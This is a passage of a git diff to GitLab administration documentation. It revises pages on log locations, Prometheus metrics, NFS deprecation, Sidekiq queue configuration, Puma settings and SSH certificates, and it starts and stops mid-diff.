+Depending on your installation method, this file is located at: -- `/var/log/gitlab/gitlab-rails/update_mirror_service_json.log` for Omnibus GitLab installations. -- `/home/git/gitlab/log/update_mirror_service_json.log` for installations from source. +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/update_mirror_service_json.log` +- Installations from source: `/home/git/gitlab/log/update_mirror_service_json.log` This file contains information about LFS errors that occurred during project mirroring. While we work to move other project mirroring errors into this log, the [general log](#productionlog) @@ -909,20 +957,20 @@ can be used. ## Registry Logs -For Omnibus installations, Container Registry logs reside in `/var/log/gitlab/registry/current`. +For Omnibus GitLab installations, Container Registry logs are in `/var/log/gitlab/registry/current`. ## NGINX Logs -For Omnibus installations, NGINX logs reside in: +For Omnibus GitLab installations, NGINX logs are in: -- `/var/log/gitlab/nginx/gitlab_access.log` contains a log of requests made to GitLab. -- `/var/log/gitlab/nginx/gitlab_error.log` contains a log of NGINX errors for GitLab. -- `/var/log/gitlab/nginx/gitlab_pages_access.log` contains a log of requests made to Pages static sites. -- `/var/log/gitlab/nginx/gitlab_pages_error.log` contains a log of NGINX errors for Pages static sites. -- `/var/log/gitlab/nginx/gitlab_registry_access.log` contains a log of requests made to the Container Registry. -- `/var/log/gitlab/nginx/gitlab_registry_error.log` contains a log of NGINX errors for the Container Registry. -- `/var/log/gitlab/nginx/gitlab_mattermost_access.log` contains a log of requests made to Mattermost. -- `/var/log/gitlab/nginx/gitlab_mattermost_error.log` contains a log of NGINX errors for Mattermost. +- `/var/log/gitlab/nginx/gitlab_access.log`: A log of requests made to GitLab +- `/var/log/gitlab/nginx/gitlab_error.log`: A log of NGINX errors for GitLab +- `/var/log/gitlab/nginx/gitlab_pages_access.log`: A log of requests made to Pages static sites +- `/var/log/gitlab/nginx/gitlab_pages_error.log`: A log of NGINX errors for Pages static sites +- `/var/log/gitlab/nginx/gitlab_registry_access.log`: A log of requests made to the Container Registry +- `/var/log/gitlab/nginx/gitlab_registry_error.log`: A log of NGINX errors for the Container Registry +- `/var/log/gitlab/nginx/gitlab_mattermost_access.log`: A log of requests made to Mattermost +- `/var/log/gitlab/nginx/gitlab_mattermost_error.log`: A log of NGINX errors for Mattermost Below is the default GitLab NGINX access log format: @@ -932,7 +980,7 @@ $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$ ## Pages Logs -For Omnibus installations, Pages logs reside in `/var/log/gitlab/gitlab-pages/current`. +For Omnibus GitLab installations, Pages logs are in `/var/log/gitlab/gitlab-pages/current`. For example: @@ -961,66 +1009,68 @@ For example: ## Mattermost Logs -For Omnibus GitLab installations, Mattermost logs reside in `/var/log/gitlab/mattermost/mattermost.log`. +For Omnibus GitLab installations, Mattermost logs are in `/var/log/gitlab/mattermost/mattermost.log`. ## Workhorse Logs -For Omnibus GitLab installations, Workhorse logs reside in `/var/log/gitlab/gitlab-workhorse/`. +For Omnibus GitLab installations, Workhorse logs are in `/var/log/gitlab/gitlab-workhorse/`. ## PostgreSQL Logs -For Omnibus GitLab installations, PostgreSQL logs reside in `/var/log/gitlab/postgresql/`. +For Omnibus GitLab installations, PostgreSQL logs are in `/var/log/gitlab/postgresql/`. ## Prometheus Logs -For Omnibus GitLab installations, Prometheus logs reside in `/var/log/gitlab/prometheus/`. +For Omnibus GitLab installations, Prometheus logs are in `/var/log/gitlab/prometheus/`. ## Redis Logs -For Omnibus GitLab installations, Redis logs reside in `/var/log/gitlab/redis/`. +For Omnibus GitLab installations, Redis logs are in `/var/log/gitlab/redis/`. ## Alertmanager Logs -For Omnibus GitLab installations, Alertmanager logs reside in `/var/log/gitlab/alertmanager/`. +For Omnibus GitLab installations, Alertmanager logs are in `/var/log/gitlab/alertmanager/`. <!-- vale gitlab.Spelling = NO --> ## Crond Logs -For Omnibus GitLab installations, crond logs reside in `/var/log/gitlab/crond/`. +For Omnibus GitLab installations, crond logs are in `/var/log/gitlab/crond/`. <!-- vale gitlab.Spelling = YES --> ## Grafana Logs -For Omnibus GitLab installations, Grafana logs reside in `/var/log/gitlab/grafana/`. +For Omnibus GitLab installations, Grafana logs are in `/var/log/gitlab/grafana/`. ## LogRotate Logs -For Omnibus GitLab installations, `logrotate` logs reside in `/var/log/gitlab/logrotate/`. +For Omnibus GitLab installations, `logrotate` logs are in `/var/log/gitlab/logrotate/`. ## GitLab Monitor Logs -For Omnibus GitLab installations, GitLab Monitor logs reside in `/var/log/gitlab/gitlab-monitor/`. +For Omnibus GitLab installations, GitLab Monitor logs are in `/var/log/gitlab/gitlab-monitor/`. ## GitLab Exporter -For Omnibus GitLab installations, GitLab Exporter logs reside in `/var/log/gitlab/gitlab-exporter/`. +For Omnibus GitLab installations, GitLab Exporter logs are in `/var/log/gitlab/gitlab-exporter/`. ## GitLab Kubernetes Agent Server -For Omnibus GitLab installations, GitLab Kubernetes Agent Server logs reside +For Omnibus GitLab installations, GitLab Kubernetes Agent Server logs are in `/var/log/gitlab/gitlab-kas/`. ## Performance bar stats > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/48149) in GitLab 13.7. -This file lives in `/var/log/gitlab/gitlab-rails/performance_bar_json.log` for -Omnibus GitLab packages or in `/home/git/gitlab/log/performance_bar_json.log` for -installations from source. +Depending on your installation method, this file is located at: + +- Omnibus GitLab: `/var/log/gitlab/gitlab-rails/performance_bar_json.log` +- Installations from source: `/home/git/gitlab/log/performance_bar_json.log` -Performance bar statistics (currently only duration of SQL queries) are recorded in that file. For example: +Performance bar statistics (currently only duration of SQL queries) are recorded +in that file. For example: ```json {"severity":"INFO","time":"2020-12-04T09:29:44.592Z","correlation_id":"33680b1490ccd35981b03639c406a697","filename":"app/models/ci/pipeline.rb","method_path":"app/models/ci/pipeline.rb:each_with_object","request_id":"rYHomD0VJS4","duration_ms":26.889,"count":2,"type": "sql"} diff --git a/doc/administration/maintenance_mode/index.md b/doc/administration/maintenance_mode/index.md index 2f5d366f927..37415468517 100644 --- a/doc/administration/maintenance_mode/index.md +++ b/doc/administration/maintenance_mode/index.md @@ -8,7 +8,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w > [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/2149) in GitLab Premium 13.9. -Maintenance Mode allows administrators to reduce write operations to a minimum while maintenance tasks are performed. The main goal is to block all external actions that change the internal state, including the PostgreSQL database, but especially files, Git repositories, Container repositories, etc. +Maintenance Mode allows administrators to reduce write operations to a minimum while maintenance tasks are performed. The main goal is to block all external actions that change the internal state, including the PostgreSQL database, but especially files, Git repositories, Container repositories, and so on. Once Maintenance Mode is enabled, in-progress actions finish relatively quickly since no new actions are coming in, and internal state changes are minimal. In that state, various maintenance tasks are easier, and services can be stopped completely or be diff --git a/doc/administration/monitoring/ip_whitelist.md b/doc/administration/monitoring/ip_whitelist.md index 522267ce362..20c97a0df8f 100644 --- a/doc/administration/monitoring/ip_whitelist.md +++ b/doc/administration/monitoring/ip_whitelist.md @@ -29,6 +29,21 @@ hosts or use IP ranges: --- +**For installations using cloud native Helm charts** + +You can set the required IPs under the `gitlab.webservice.monitoring.ipWhitelist` key. For example: + +```yaml +gitlab: + webservice: + monitoring: + # Monitoring IP whitelist + ipWhitelist: + - 0.0.0.0/0 # Default +``` + +--- + **For installations from source** 1. Edit `config/gitlab.yml`: diff --git a/doc/administration/monitoring/performance/img/performance_bar.png b/doc/administration/monitoring/performance/img/performance_bar.png Binary files differdeleted file mode 100644 index 380e2060b24..00000000000 --- a/doc/administration/monitoring/performance/img/performance_bar.png +++ /dev/null diff --git a/doc/administration/monitoring/performance/img/performance_bar_v14_0.png b/doc/administration/monitoring/performance/img/performance_bar_v14_0.png Binary files differnew file mode 100644 index 00000000000..42261ddd720 --- /dev/null +++ b/doc/administration/monitoring/performance/img/performance_bar_v14_0.png diff --git a/doc/administration/monitoring/performance/performance_bar.md b/doc/administration/monitoring/performance/performance_bar.md index 1125547f13f..5a7e8e12a38 100644 --- a/doc/administration/monitoring/performance/performance_bar.md +++ b/doc/administration/monitoring/performance/performance_bar.md @@ -12,7 +12,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w You can display the GitLab Performance Bar to see statistics for the performance of a page. When activated, it looks as follows: - + From left to right, it displays: diff --git a/doc/administration/monitoring/prometheus/gitlab_metrics.md b/doc/administration/monitoring/prometheus/gitlab_metrics.md index 7e72f6ed7df..2aa95a2b0f1 100644 --- a/doc/administration/monitoring/prometheus/gitlab_metrics.md +++ b/doc/administration/monitoring/prometheus/gitlab_metrics.md @@ -98,6 +98,8 @@ The following metrics are available: | `gitlab_transaction_db_write_count_total` | Counter | 13.1 | Counter for total number of write SQL calls | `controller`, `action` | | `gitlab_transaction_db_cached_count_total` | Counter | 13.1 | Counter for total number of cached SQL calls | `controller`, `action` | | `gitlab_transaction_db_<role>_cached_count_total` | Counter | 13.1 | Counter for total number of cached SQL calls, grouped by database roles (primary/replica) | `controller`, `action` | +| `gitlab_transaction_db_<role>_wal_count_total` | Counter | 14.0 | Counter for total number of WAL (write ahead log location) queries, grouped by database roles (primary/replica) | `controller`, `action` | +| `gitlab_transaction_db_<role>_wal_cached_count_total` | Counter | 14.1 | Counter for total number of cached WAL (write ahead log location) queries, grouped by database roles (primary/replica)| `controller`, `action` | | `http_elasticsearch_requests_duration_seconds` **(PREMIUM)** | Histogram | 13.1 | Elasticsearch requests duration during web transactions | `controller`, `action` | | `http_elasticsearch_requests_total` **(PREMIUM)** | Counter | 13.1 | Elasticsearch requests count during web transactions | `controller`, `action` | | `pipelines_created_total` | Counter | 9.4 | Counter of pipelines created | | @@ -119,6 +121,7 @@ The following metrics are available: | `action_cable_single_client_transmissions_total` | Counter | 13.10 | The number of ActionCable messages transmitted to any client in any channel | `server_mode` | | `action_cable_subscription_confirmations_total` | Counter | 13.10 | The number of ActionCable subscriptions from clients confirmed | `server_mode` | | `action_cable_subscription_rejections_total` | Counter | 13.10 | The number of ActionCable subscriptions from clients rejected | `server_mode` | +| `action_cable_transmitted_bytes` | Histogram | 14.1 | Message size, in bytes, transmitted over action cable | `operation`, `channel` | | `gitlab_issuable_fast_count_by_state_total` | Counter | 13.5 | Total number of row count operations on issue/merge request list pages | | | `gitlab_issuable_fast_count_by_state_failures_total` | Counter | 13.5 | Number of soft-failed row count operations on issue/merge request list pages | | | `gitlab_external_http_total` | Counter | 13.8 | Total number of HTTP calls to external systems | `controller`, `action` | @@ -133,6 +136,10 @@ The following metrics are available: | `gitlab_spamcheck_request_duration_seconds` | Histogram | 13.12 | The duration for requests between Rails and the anti-spam engine | | | `service_desk_thank_you_email` | Counter | 14.0 | Total number of email responses to new service desk emails | | | `service_desk_new_note_email` | Counter | 14.0 | Total number of email notifications on new service desk comment | | +| `email_receiver_error` | Counter | 14.1 | Total number of errors when processing incoming emails | | +| `gitlab_snowplow_events_total` | Counter | 14.1 | Total number of GitLab Snowplow product intelligence events emitted | | +| `gitlab_snowplow_failed_events_total` | Counter | 14.1 | Total number of GitLab Snowplow product intelligence events emission failures | | +| `gitlab_snowplow_successful_events_total` | Counter | 14.1 | Total number of GitLab Snowplow product intelligence events emission successes | | ## Metrics controlled by a feature flag @@ -262,10 +269,11 @@ configuration option in `gitlab.yml`. These metrics are served from the The following metrics are available: -| Metric | Type | Since | Description | Labels | -|:--------------------------------- |:--------- |:------------------------------------------------------------- |:-------------------------------------- |:--------------------------------------------------------- | -| `db_load_balancing_hosts` | Gauge | [12.3](https://gitlab.com/gitlab-org/gitlab/-/issues/13630) | Current number of load balancing hosts | | -| `sidekiq_load_balancing_count` | Counter | 13.11 | Sidekiq jobs using load balancing with data consistency set to :sticky or :delayed | `queue`, `boundary`, `external_dependencies`, `feature_category`, `job_status`, `urgency`, `data_consistency`, `database_chosen` | +| Metric | Type | Since | Description | Labels | +|:-------------------------------------------------------- |:--------- |:------------------------------------------------------------- |:---------------------------------------------------------------------------------- |:---------------------------------------------------------------------------------------------------------------------------------------- | +| `db_load_balancing_hosts` | Gauge | [12.3](https://gitlab.com/gitlab-org/gitlab/-/issues/13630) | Current number of load balancing hosts | | +| `sidekiq_load_balancing_count` | Counter | 13.11 | Sidekiq jobs using load balancing with data consistency set to :sticky or :delayed | `queue`, `boundary`, `external_dependencies`, `feature_category`, `job_status`, `urgency`, `data_consistency`, `load_balancing_strategy` | +| `gitlab_transaction_caught_up_replica_pick_count_total` | Counter | 14.1 | Number of search attempts for caught up replica | `result` | ## Database partitioning metrics **(PREMIUM SELF)** @@ -336,7 +344,7 @@ These client metrics are meant to complement Redis server metrics. These metrics are broken down per [Redis instance](https://docs.gitlab.com/omnibus/settings/redis.html#running-with-multiple-redis-instances). These metrics all have a `storage` label which indicates the Redis -instance (`cache`, `shared_state` etc.). +instance (`cache`, `shared_state`, and so on). | Metric | Type | Since | Description | |:--------------------------------- |:------- |:----- |:----------- | diff --git a/doc/administration/nfs.md b/doc/administration/nfs.md index e53f2af3440..c4ff19ec3ea 100644 --- a/doc/administration/nfs.md +++ b/doc/administration/nfs.md @@ -10,7 +10,7 @@ type: reference NFS can be used as an alternative for object storage but this isn't typically recommended for performance reasons. -For data objects such as LFS, Uploads, Artifacts, etc., an [Object Storage service](object_storage.md) +For data objects such as LFS, Uploads, Artifacts, and so on, an [Object Storage service](object_storage.md) is recommended over NFS where possible, due to better performance. File system performance can impact overall GitLab performance, especially for @@ -20,11 +20,13 @@ file system performance, see ## Gitaly and NFS deprecation -WARNING: -From GitLab 14.0, enhancements and bug fixes for NFS for Git repositories are no longer -considered and customer technical support is considered out of scope. -[Read more about Gitaly and NFS](gitaly/index.md#nfs-deprecation-notice) and -[the correct mount options to use](#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). +Engineering support for NFS for Git repositories is deprecated. Technical support is planned to be +unavailable from GitLab 15.0. No further enhancements are planned for this feature. + +Read: + +- The [Gitaly and NFS deprecation notice](gitaly/index.md#nfs-deprecation-notice). +- About the [correct mount options to use](#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). ## Known kernel version incompatibilities @@ -100,7 +102,7 @@ and GIDs (which is off by default in some cases) for simplified permission management between systems: - [NetApp instructions](https://library.netapp.com/ecmdocs/ECMP1401220/html/GUID-24367A9F-E17B-4725-ADC1-02D86F56F78E.html) -- For non-NetApp devices, disable NFSv4 `idmapping` by performing opposite of [enable NFSv4 idmapper](https://wiki.archlinux.org/index.php/NFS#Enabling_NFSv4_idmapping) +- For non-NetApp devices, disable NFSv4 `idmapping` by performing opposite of [enable NFSv4 idmapper](https://wiki.archlinux.org/title/NFS#Enabling_NFSv4_idmapping) ### Disable NFS server delegation @@ -368,9 +370,8 @@ sudo ufw allow from <client_ip_address> to any port nfs ### Upgrade to Gitaly Cluster or disable caching if experiencing data loss WARNING: -From GitLab 13.0, using NFS for Git repositories is deprecated. -As of GitLab 14.0, NFS-related issues with Gitaly are no longer addressed. Read -more about [Gitaly and NFS deprecation](gitaly/index.md#nfs-deprecation-notice). +Engineering support for NFS for Git repositories is deprecated. Read the +[Gitaly and NFS deprecation notice](gitaly/index.md#nfs-deprecation-notice). Customers and users have reported data loss on high-traffic repositories when using NFS for Git repositories. For example, we have seen: diff --git a/doc/administration/object_storage.md b/doc/administration/object_storage.md index f1025bd1846..525b41359cf 100644 --- a/doc/administration/object_storage.md +++ b/doc/administration/object_storage.md @@ -537,7 +537,7 @@ the original form is omitted. To move to the consolidated form, remove the original configuration (for example, `artifacts_object_store_enabled`, or `uploads_object_store_connection`) -## Storage-specific configuration +### Storage-specific configuration For configuring object storage in GitLab 13.1 and earlier, or for storage types not supported by consolidated configuration form, refer to the following guides: @@ -580,7 +580,7 @@ There are plans to [enable the use of a single bucket](https://gitlab.com/gitlab in the future. Helm-based installs require separate buckets to -[handle backup restorations](https://docs.gitlab.com/charts/advanced/external-object-storage/#lfs-artifacts-uploads-packages-external-diffs-pseudonymizer) +[handle backup restorations](https://docs.gitlab.com/charts/advanced/external-object-storage/#lfs-artifacts-uploads-packages-external-diffs-pseudonymizer). ### S3 API compatibility issues @@ -591,12 +591,6 @@ with the Fog library that GitLab uses. Symptoms include an error in `production. 411 Length Required ``` -### Incremental logging is required for CI to use object storage - -If you configure GitLab to use object storage for CI logs and artifacts, -you can avoid [local disk usage for job logs](job_logs.md#data-flow) by enabling -[beta incremental logging](job_logs.md#incremental-logging-architecture). - ### Proxy Download Clients can download files in object storage by receiving a pre-signed, time-limited URL, @@ -724,21 +718,6 @@ must be fulfilled: [ETag mismatch errors](#etag-mismatch) occur if server side encryption headers are used without enabling the Workhorse S3 client. -##### Disabling the feature - -The Workhorse S3 client is enabled by default when the -[`use_iam_profile` configuration option](#iam-permissions) is set to `true` or consolidated -object storage settings are configured. - -The feature can be disabled using the `:use_workhorse_s3_client` feature flag. To disable the -feature, ask a GitLab administrator with -[Rails console access](feature_flags.md#how-to-enable-and-disable-features-behind-flags) to run the -following command: - -```ruby -Feature.disable(:use_workhorse_s3_client) -``` - #### IAM Permissions To set up an instance profile: diff --git a/doc/administration/operations/extra_sidekiq_processes.md b/doc/administration/operations/extra_sidekiq_processes.md index b910a789d29..1f195bcc378 100644 --- a/doc/administration/operations/extra_sidekiq_processes.md +++ b/doc/administration/operations/extra_sidekiq_processes.md @@ -74,8 +74,9 @@ To start multiple processes: just handles the `mailers` queue. When `sidekiq-cluster` is only running on a single node, make sure that at least - one process is running on all queues using `*`. This means a process is - This includes queues that have dedicated processes. + one process is running on all queues using `*`. This ensures a process + automatically picks up jobs in queues created in the future, + including queues that have dedicated processes. If `sidekiq-cluster` is running on more than one node, you can also use [`--negate`](#negate-settings) and list all the queues that are already being @@ -95,13 +96,16 @@ To view the Sidekiq processes in GitLab: ## Negate settings To have the additional Sidekiq processes work on every queue **except** the ones -you list: +you list. In this example, we exclude all import-related jobs from a Sidekiq node: 1. After you follow the steps for [starting extra processes](#start-multiple-processes), edit `/etc/gitlab/gitlab.rb` and add: ```ruby sidekiq['negate'] = true + sidekiq['queue_groups'] = [ + "feature_category=importers" + ] ``` 1. Save the file and reconfigure GitLab for the changes to take effect: @@ -171,7 +175,7 @@ When disabling `sidekiq_cluster`, you must copy your configuration for `sidekiq_cluster` is overridden by the options for `sidekiq` when setting `sidekiq['cluster'] = true`. -When using this feature, the service called `sidekiq` is now +When using this feature, the service called `sidekiq` is now running `sidekiq-cluster`. The [concurrency](#manage-concurrency) and other options configured @@ -180,32 +184,21 @@ for Sidekiq are respected. By default, logs for `sidekiq-cluster` go to `/var/log/gitlab/sidekiq` like regular Sidekiq logs. -## Ignore all GitHub import queues +## Ignore all import queues -When [importing from GitHub](../../user/project/import/github.md), Sidekiq might -use all of its resources to perform those operations. To set up a separate -`sidekiq-cluster` process to ignore all GitHub import-related queues: +When [importing from GitHub](../../user/project/import/github.md) or +other sources, Sidekiq might use all of its resources to perform those +operations. To set up two separate `sidekiq-cluster` processes, where +one only processes imports and the other processes all other queues: 1. Edit `/etc/gitlab/gitlab.rb` and add: ```ruby sidekiq['enable'] = true - sidekiq['negate'] = true + sidekiq['queue_selector'] = true sidekiq['queue_groups'] = [ - "github_import_advance_stage", - "github_importer:github_import_import_diff_note", - "github_importer:github_import_import_issue", - "github_importer:github_import_import_note", - "github_importer:github_import_import_lfs_object", - "github_importer:github_import_import_pull_request", - "github_importer:github_import_refresh_import_jid", - "github_importer:github_import_stage_finish_import", - "github_importer:github_import_stage_import_base_data", - "github_importer:github_import_stage_import_issues_and_diff_notes", - "github_importer:github_import_stage_import_notes", - "github_importer:github_import_stage_import_lfs_objects", - "github_importer:github_import_stage_import_pull_requests", - "github_importer:github_import_stage_import_repository" + "feature_category=importers", + "feature_category!=importers" ] ``` diff --git a/doc/administration/operations/extra_sidekiq_routing.md b/doc/administration/operations/extra_sidekiq_routing.md index 93cf8bd4f43..80540b7ba46 100644 --- a/doc/administration/operations/extra_sidekiq_routing.md +++ b/doc/administration/operations/extra_sidekiq_routing.md @@ -41,7 +41,7 @@ In `/etc/gitlab/gitlab.rb`: ```ruby sidekiq['routing_rules'] = [ # Route all non-CPU-bound workers that are high urgency to `high-urgency` queue - ['resource_boundary!=cpu&urgency=high', 'high-urgency'], + ['resource_boundary!=cpu&urgency=high', 'high-urgency'], # Route all database, gitaly and global search workers that are throttled to `throttled` queue ['feature_category=database,gitaly,global_search&urgency=throttled', 'throttled'], # Route all workers having contact with outside work to a `network-intenstive` queue @@ -99,7 +99,7 @@ based on a subset of worker attributes: - `urgency` - how important it is that this queue's jobs run quickly. Can be `high`, `low`, or `throttled`. For example, the `authorized_projects` queue is used to refresh user permissions, and - is high urgency. + is `high` urgency. - `worker_name` - the worker name. The other attributes are typically more useful as they are more general, but this is available in case a particular worker needs to be selected. diff --git a/doc/administration/operations/puma.md b/doc/administration/operations/puma.md index fffff78b9d6..e8477eaf686 100644 --- a/doc/administration/operations/puma.md +++ b/doc/administration/operations/puma.md @@ -4,35 +4,102 @@ group: Distribution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Switching to Puma **(FREE SELF)** +# Puma **(FREE SELF)** -As of GitLab 12.9, [Puma](https://github.com/puma/puma) has replaced [Unicorn](https://yhbt.net/unicorn/) -as the default web server. From GitLab 14.0, the following run Puma: +Puma is a simple, fast, multi-threaded, and highly concurrent HTTP 1.1 server for +Ruby applications. It's the default GitLab web server since GitLab 13.0 +and has replaced Unicorn. From GitLab 14.0, Unicorn is no longer supported. -- All-in-one package-based installations. -- Helm chart-based installations. +NOTE: +Starting with GitLab 13.0, Puma is the default web server and Unicorn has been disabled. +In GitLab 14.0, Unicorn was removed from the Linux package and only Puma is available. -## Why switch to Puma? +## Configure Puma -Puma has a multi-thread architecture which uses less memory than a multi-process -application server like Unicorn. On GitLab.com, we saw a 40% reduction in memory -consumption. +To configure Puma: -Most Rails applications requests normally include a proportion of I/O wait time. -During I/O wait time MRI Ruby will release the GVL (Global VM Lock) to other threads. -Multi-threaded Puma can therefore still serve more requests than a single process. +1. Determine suitable Puma worker and thread [settings](../../install/requirements.md#puma-settings). +1. If you're switching from Unicorn, [convert any custom settings to Puma](#convert-unicorn-settings-to-puma). +1. For multi-node deployments, configure the load balancer to use the + [readiness check](../load_balancer.md#readiness-check). +1. Reconfigure GitLab so the above changes take effect: + + ```shell + sudo gitlab-ctl reconfigure + ``` + +For Helm-based deployments, see the +[`webservice` chart documentation](https://docs.gitlab.com/charts/charts/gitlab/webservice/index.html). + +For more details about the Puma configuration, see the +[Puma documentation](https://github.com/puma/puma#configuration). + +## Puma Worker Killer + +By default: + +- The [Puma Worker Killer](https://github.com/schneems/puma_worker_killer) restarts a worker if it + exceeds a [memory limit](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/cluster/puma_worker_killer_initializer.rb). +- Rolling restarts of Puma workers are performed every 12 hours. + +To change the memory limit setting: + +1. Edit `/etc/gitlab/gitlab.rb`: + + ```ruby + puma['per_worker_max_memory_mb'] = 1024 + ``` + +1. Reconfigure GitLab for the changes to take effect: + + ```shell + sudo gitlab-ctl reconfigure + ``` + +## Worker timeout + +A [timeout of 60 seconds](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/initializers/rack_timeout.rb) +is used when Puma is enabled. + +NOTE: +Unlike Unicorn, the `puma['worker_timeout']` setting does not set the maximum request duration. -## Configuring Puma to replace Unicorn +To change the worker timeout: -Beginning with GitLab 13.0, Puma is the default application server. We removed support for -Unicorn in GitLab 14.0. +1. Edit `/etc/gitlab/gitlab.rb`: -When switching to Puma, Unicorn server configuration -will _not_ carry over automatically, due to differences between the two application servers. For Omnibus-based -deployments, see [Configuring Puma Settings](https://docs.gitlab.com/omnibus/settings/puma.html#configuring-puma-settings). -For Helm based deployments, see the [`webservice` chart documentation](https://docs.gitlab.com/charts/charts/gitlab/webservice/index.html). + ```ruby + gitlab_rails['env'] = { + 'GITLAB_RAILS_RACK_TIMEOUT' => 600 + } + ``` -Additionally we strongly recommend that multi-node deployments [configure their load balancers to use the readiness check](../load_balancer.md#readiness-check) due to a difference between Unicorn and Puma in how they handle connections during a restart of the service. +1. Reconfigure GitLab for the changes to take effect: + + ```shell + sudo gitlab-ctl reconfigure + ``` + +## Memory-constrained environments + +In a memory-constrained environment with less than 4GB of RAM available, consider disabling Puma +[Clustered mode](https://github.com/puma/puma#clustered-mode). + +Configuring Puma by setting the amount of `workers` to `0` could reduce memory usage by hundreds of MB. +For details on Puma worker and thread settings, see the [Puma requirements](../../install/requirements.md#puma-settings). + +Unlike in a Clustered mode, which is set up by default, only a single Puma process would serve the application. + +The downside of running Puma with such configuration is the reduced throughput, which could be +considered as a fair tradeoff in a memory-constraint environment. + +When running Puma in Single mode, some features are not supported: + +- Phased restart do not work: [issue](https://gitlab.com/gitlab-org/gitlab/-/issues/300665) +- [Phased restart](https://gitlab.com/gitlab-org/gitlab/-/issues/300665) +- [Puma Worker Killer](https://gitlab.com/gitlab-org/gitlab/-/issues/300664) + +To learn more, visit [epic 5303](https://gitlab.com/groups/gitlab-org/-/epics/5303). ## Performance caveat when using Puma with Rugged @@ -66,3 +133,46 @@ optimal configuration: Rugged, single-threaded Puma works the same as Unicorn. - To force Rugged to be used with multi-threaded Puma, you can use [feature flags](../../development/gitaly.md#legacy-rugged-code). + +## Convert Unicorn settings to Puma + +NOTE: +Starting with GitLab 13.0, Puma is the default web server and Unicorn has been +disabled by default. In GitLab 14.0, Unicorn was removed from the Linux package +and only Puma is available. + +Puma has a multi-thread architecture which uses less memory than a multi-process +application server like Unicorn. On GitLab.com, we saw a 40% reduction in memory +consumption. Most Rails applications requests normally include a proportion of I/O wait time. + +During I/O wait time MRI Ruby releases the GVL (Global VM Lock) to other threads. +Multi-threaded Puma can therefore still serve more requests than a single process. + +When switching to Puma, any Unicorn server configuration will _not_ carry over +automatically, due to differences between the two application servers. + +The table below summarizes which Unicorn configuration keys correspond to those +in Puma when using the Linux package, and which ones have no corresponding counterpart. + +| Unicorn | Puma | +| ------------------------------------ | ---------------------------------- | +| `unicorn['enable']` | `puma['enable']` | +| `unicorn['worker_timeout']` | `puma['worker_timeout']` | +| `unicorn['worker_processes']` | `puma['worker_processes']` | +| n/a | `puma['ha']` | +| n/a | `puma['min_threads']` | +| n/a | `puma['max_threads']` | +| `unicorn['listen']` | `puma['listen']` | +| `unicorn['port']` | `puma['port']` | +| `unicorn['socket']` | `puma['socket']` | +| `unicorn['pidfile']` | `puma['pidfile']` | +| `unicorn['tcp_nopush']` | n/a | +| `unicorn['backlog_socket']` | n/a | +| `unicorn['somaxconn']` | `puma['somaxconn']` | +| n/a | `puma['state_path']` | +| `unicorn['log_directory']` | `puma['log_directory']` | +| `unicorn['worker_memory_limit_min']` | n/a | +| `unicorn['worker_memory_limit_max']` | `puma['per_worker_max_memory_mb']` | +| `unicorn['exporter_enabled']` | `puma['exporter_enabled']` | +| `unicorn['exporter_address']` | `puma['exporter_address']` | +| `unicorn['exporter_port']` | `puma['exporter_port']` | diff --git a/doc/administration/operations/sidekiq_memory_killer.md b/doc/administration/operations/sidekiq_memory_killer.md index d3019e2c580..598baa4fcc7 100644 --- a/doc/administration/operations/sidekiq_memory_killer.md +++ b/doc/administration/operations/sidekiq_memory_killer.md @@ -25,7 +25,7 @@ minute of delay for incoming background jobs. Some background jobs rely on long-running external processes. To ensure these are cleanly terminated when Sidekiq is restarted, each Sidekiq process should be -run as a process group leader (e.g., using `chpst -P`). If using Omnibus or the +run as a process group leader (for example, using `chpst -P`). If using Omnibus or the `bin/background_jobs` script with `runit` installed, this is handled for you. ## Configuring the MemoryKiller @@ -80,4 +80,4 @@ The MemoryKiller is controlled using environment variables. If the process hard shutdown/restart is not performed by Sidekiq, the Sidekiq process is forcefully terminated after `Sidekiq.options[:timeout] + 2` seconds. An external supervision mechanism - (e.g. runit) must restart Sidekiq afterwards. + (for example, runit) must restart Sidekiq afterwards. diff --git a/doc/administration/operations/ssh_certificates.md b/doc/administration/operations/ssh_certificates.md index 508d284b0bd..374eebeb773 100644 --- a/doc/administration/operations/ssh_certificates.md +++ b/doc/administration/operations/ssh_certificates.md @@ -41,11 +41,11 @@ uploading user SSH keys to GitLab entirely. How to fully set up SSH certificates is outside the scope of this document. See [OpenSSH's `PROTOCOL.certkeys`](https://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/PROTOCOL.certkeys?annotate=HEAD) -for how it works, and e.g. [RedHat's documentation about +for how it works, for example [RedHat's documentation about it](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/sec-using_openssh_certificate_authentication). We assume that you already have SSH certificates set up, and have -added the `TrustedUserCAKeys` of your CA to your `sshd_config`, e.g.: +added the `TrustedUserCAKeys` of your CA to your `sshd_config`, for example: ```plaintext TrustedUserCAKeys /etc/security/mycompany_user_ca.pub @@ -58,7 +58,7 @@ used for GitLab consider putting this in the `Match User git` section (described below). The SSH certificates being issued by that CA **MUST** have a "key ID" -corresponding to that user's username on GitLab, e.g. (some output +corresponding to that user's username on GitLab, for example (some output omitted for brevity): ```shell @@ -77,7 +77,7 @@ $ ssh-add -L | grep cert | ssh-keygen -L -f - [...] ``` -Technically that's not strictly true, e.g. it could be +Technically that's not strictly true, for example, it could be `prod-aearnfjord` if it's a SSH certificate you'd normally log in to servers as the `prod-aearnfjord` user, but then you must specify your own `AuthorizedPrincipalsCommand` to do that mapping instead of using @@ -107,13 +107,13 @@ command="/opt/gitlab/embedded/service/gitlab-shell/bin/gitlab-shell username-{KE ``` Where `{KEY_ID}` is the `%i` argument passed to the script -(e.g. `aeanfjord`), and `{PRINCIPAL}` is the principal passed to it -(e.g. `sshUsers`). +(for example, `aeanfjord`), and `{PRINCIPAL}` is the principal passed to it +(for example, `sshUsers`). You need to customize the `sshUsers` part of 